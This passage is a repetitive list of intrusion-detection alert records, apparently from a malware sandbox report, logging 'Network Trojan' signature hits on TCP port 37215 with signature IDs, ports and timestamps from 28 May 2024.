                  SID:2829579
                  Source Port:36568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555473
                  SID:2835222
                  Source Port:42964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628022
                  SID:2829579
                  Source Port:58188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788968
                  SID:2835222
                  Source Port:46098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584565
                  SID:2829579
                  Source Port:57182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659985
                  SID:2835222
                  Source Port:59514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.864999
                  SID:2829579
                  Source Port:33256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277975
                  SID:2835222
                  Source Port:34934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543456
                  SID:2835222
                  Source Port:41018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791532
                  SID:2835222
                  Source Port:50650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665478
                  SID:2829579
                  Source Port:40428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528865
                  SID:2835222
                  Source Port:52362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585335
                  SID:2835222
                  Source Port:49024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542763
                  SID:2835222
                  Source Port:46196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713780
                  SID:2835222
                  Source Port:48198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793638
                  SID:2829579
                  Source Port:33038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678722
                  SID:2835222
                  Source Port:53290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.900444
                  SID:2835222
                  Source Port:34202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904733
                  SID:2835222
                  Source Port:35724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488163
                  SID:2829579
                  Source Port:40898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536129
                  SID:2829579
                  Source Port:40494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.544620
                  SID:2829579
                  Source Port:55266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793312
                  SID:2835222
                  Source Port:51990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.876888
                  SID:2835222
                  Source Port:48296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912830
                  SID:2835222
                  Source Port:43830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912833
                  SID:2829579
                  Source Port:41056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908564
                  SID:2835222
                  Source Port:37990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.915656
                  SID:2829579
                  Source Port:38030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.532180
                  SID:2835222
                  Source Port:60582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791480
                  SID:2829579
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.914378
                  SID:2829579
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.877020
                  SID:2829579
                  Source Port:55488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887856
                  SID:2829579
                  Source Port:39546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.596893
                  SID:2835222
                  Source Port:51724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628364
                  SID:2829579
                  Source Port:34570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.584770
                  SID:2835222
                  Source Port:46910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537630
                  SID:2829579
                  Source Port:58386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598910
                  SID:2835222
                  Source Port:37964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786495
                  SID:2829579
                  Source Port:45866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885458
                  SID:2829579
                  Source Port:55852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849256
                  SID:2829579
                  Source Port:45818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769256
                  SID:2829579
                  Source Port:40904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768730
                  SID:2835222
                  Source Port:53388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846088
                  SID:2829579
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795583
                  SID:2829579
                  Source Port:50296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665496
                  SID:2829579
                  Source Port:57584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.887348
                  SID:2829579
                  Source Port:42662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586407
                  SID:2829579
                  Source Port:37484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793554
                  SID:2835222
                  Source Port:37218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907361
                  SID:2835222
                  Source Port:44034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493050
                  SID:2829579
                  Source Port:38032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549097
                  SID:2829579
                  Source Port:49008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874574
                  SID:2829579
                  Source Port:34624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278084
                  SID:2835222
                  Source Port:59892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910437
                  SID:2829579
                  Source Port:37610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.495067
                  SID:2829579
                  Source Port:34896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750018
                  SID:2829579
                  Source Port:49142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843665
                  SID:2829579
                  Source Port:40294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664634
                  SID:2835222
                  Source Port:45594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660584
                  SID:2835222
                  Source Port:50264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.884820
                  SID:2829579
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542775
                  SID:2829579
                  Source Port:42718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.700242
                  SID:2835222
                  Source Port:50050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888419
                  SID:2829579
                  Source Port:41172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629670
                  SID:2835222
                  Source Port:59344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682944
                  SID:2829579
                  Source Port:36766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.661156
                  SID:2829579
                  Source Port:44020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790717
                  SID:2835222
                  Source Port:56118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713750
                  SID:2835222
                  Source Port:43774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315992
                  SID:2835222
                  Source Port:40678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.296179
                  SID:2829579
                  Source Port:44960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:09.531251
                  SID:2835222
                  Source Port:47516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.622269
                  SID:2829579
                  Source Port:48040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295901
                  SID:2030490
                  Source Port:52054
                  Destination Port:19990
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.700265
                  SID:2829579
                  Source Port:51278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629270
                  SID:2835222
                  Source Port:42722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.544343
                  SID:2829579
                  Source Port:56404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729764
                  SID:2835222
                  Source Port:35392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276767
                  SID:2829579
                  Source Port:44850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788925
                  SID:2835222
                  Source Port:35374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789786
                  SID:2835222
                  Source Port:49574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719418
                  SID:2835222
                  Source Port:45760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530596
                  SID:2835222
                  Source Port:36174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719155
                  SID:2835222
                  Source Port:53700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279380
                  SID:2835222
                  Source Port:45064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809969
                  SID:2835222
                  Source Port:39638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283850
                  SID:2835222
                  Source Port:39912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.882592
                  SID:2835222
                  Source Port:39610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315973
                  SID:2835222
                  Source Port:40910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.682940
                  SID:2829579
                  Source Port:54618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:12.604443
                  SID:2829579
                  Source Port:56922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719985
                  SID:2835222
                  Source Port:48374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611069
                  SID:2835222
                  Source Port:58330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.658917
                  SID:2835222
                  Source Port:33538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659589
                  SID:2829579
                  Source Port:45028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.277650
                  SID:2829579
                  Source Port:54734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649850
                  SID:2835222
                  Source Port:59672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.324125
                  SID:2829579
                  Source Port:60982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492368
                  SID:2829579
                  Source Port:54118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927153
                  SID:2829579
                  Source Port:40132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494616
                  SID:2829579
                  Source Port:59992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695690
                  SID:2835222
                  Source Port:47368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583606
                  SID:2835222
                  Source Port:60358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591844
                  SID:2829579
                  Source Port:37760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276816
                  SID:2835222
                  Source Port:43256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548247
                  SID:2835222
                  Source Port:55058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649342
                  SID:2829579
                  Source Port:39168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587103
                  SID:2829579
                  Source Port:39834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628922
                  SID:2835222
                  Source Port:48172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718867
                  SID:2835222
                  Source Port:40062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886788
                  SID:2829579
                  Source Port:57718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628984
                  SID:2829579
                  Source Port:35766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920021
                  SID:2835222
                  Source Port:60450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276866
                  SID:2829579
                  Source Port:59140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745949
                  SID:2835222
                  Source Port:50510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.860114
                  SID:2835222
                  Source Port:57294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887306
                  SID:2829579
                  Source Port:60302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315986
                  SID:2829579
                  Source Port:51408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316008
                  SID:2829579
                  Source Port:49848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.279408
                  SID:2829579
                  Source Port:38606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312348
                  SID:2835222
                  Source Port:47408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.928256
                  SID:2829579
                  Source Port:39898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319136
                  SID:2835222
                  Source Port:59432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490019
                  SID:2835222
                  Source Port:33334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:23.802022
                  SID:2829579
                  Source Port:54194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888596
                  SID:2829579
                  Source Port:41142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.598214
                  SID:2829579
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.628952
                  SID:2835222
                  Source Port:38100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548309
                  SID:2835222
                  Source Port:33200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530406
                  SID:2829579
                  Source Port:33898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.315767
                  SID:2835222
                  Source Port:53292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649418
                  SID:2829579
                  Source Port:56678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790058
                  SID:2835222
                  Source Port:39834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930166
                  SID:2835222
                  Source Port:57122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.701035
                  SID:2829579
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.885816
                  SID:2835222
                  Source Port:44188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907882
                  SID:2835222
                  Source Port:38176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577860
                  SID:2835222
                  Source Port:42928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719890
                  SID:2829579
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886567
                  SID:2829579
                  Source Port:56984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278718
                  SID:2829579
                  Source Port:54808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661774
                  SID:2829579
                  Source Port:55000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906972
                  SID:2835222
                  Source Port:42788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316515
                  SID:2835222
                  Source Port:50016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887217
                  SID:2835222
                  Source Port:60810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911606
                  SID:2829579
                  Source Port:39274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576254
                  SID:2829579
                  Source Port:37092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483062
                  SID:2829579
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.527983
                  SID:2835222
                  Source Port:45978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.609090
                  SID:2829579
                  Source Port:33962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847708
                  SID:2835222
                  Source Port:34490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587905
                  SID:2835222
                  Source Port:48766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537050
                  SID:2835222
                  Source Port:54498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.919971
                  SID:2829579
                  Source Port:42250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678132
                  SID:2829579
                  Source Port:40264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719872
                  SID:2835222
                  Source Port:56940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.578744
                  SID:2829579
                  Source Port:44028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.497256
                  SID:2835222
                  Source Port:39488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.583532
                  SID:2835222
                  Source Port:48194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610349
                  SID:2829579
                  Source Port:52630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300964
                  SID:2829579
                  Source Port:57958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781105
                  SID:2829579
                  Source Port:57950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660468
                  SID:2835222
                  Source Port:40612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755597
                  SID:2835222
                  Source Port:55646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795542
                  SID:2829579
                  Source Port:37570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:28.922730
                  SID:2835222
                  Source Port:51416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.523583
                  SID:2829579
                  Source Port:35264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796878
                  SID:2835222
                  Source Port:44404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.811563
                  SID:2835222
                  Source Port:57292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537630
                  SID:2835222
                  Source Port:58386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585219
                  SID:2829579
                  Source Port:47878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.882572
                  SID:2829579
                  Source Port:53198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.611036
                  SID:2835222
                  Source Port:55586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766338
                  SID:2829579
                  Source Port:49784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942729
                  SID:2829579
                  Source Port:50908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.794705
                  SID:2829579
                  Source Port:55930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.738132
                  SID:2835222
                  Source Port:50380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.318672
                  SID:2829579
                  Source Port:48348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767570
                  SID:2829579
                  Source Port:35774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911192
                  SID:2835222
                  Source Port:42574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536129
                  SID:2835222
                  Source Port:40494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578455
                  SID:2835222
                  Source Port:56248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.859377
                  SID:2835222
                  Source Port:38326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
